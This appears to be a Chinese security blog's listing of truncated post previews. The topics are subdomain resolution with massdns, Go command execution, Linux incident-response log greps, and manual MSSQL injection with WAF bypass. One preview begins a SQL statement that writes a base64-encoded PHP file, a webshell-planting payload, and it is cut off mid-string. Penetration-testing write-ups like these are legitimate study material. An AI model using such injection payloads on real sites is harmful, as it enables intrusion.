提取子域名的对应ip ./bin/massdns -r lists/resolvers.txt -q -t A -o S -w results.txt bai

多种exec按需求用吧,参数很多,或者需要用很多管道符的时候推荐用/bin/bash -c 来执行 func RunCommand(command strin

Linux应急响应的常用命令 筛选暴力破解 grep -o "Failed password" /var/log/secure|uni

select '<?php file_put_contents("abab.php",base64_decode("Jmx

前言 本文首发于合天智汇 最近在准备找工作,有一家公司给我发来了这样一条消息,于是有了这篇文章. 因本文是bypass成功后,才写的可能会缺少一些图.(耗费本

前言 最近投了一家上来就说要测试,给我丢了个注入靶场,本以为可以用sqlmap一把梭,没想到考的是mssql手注+bypassWAF而且还是双WAF(宝塔+安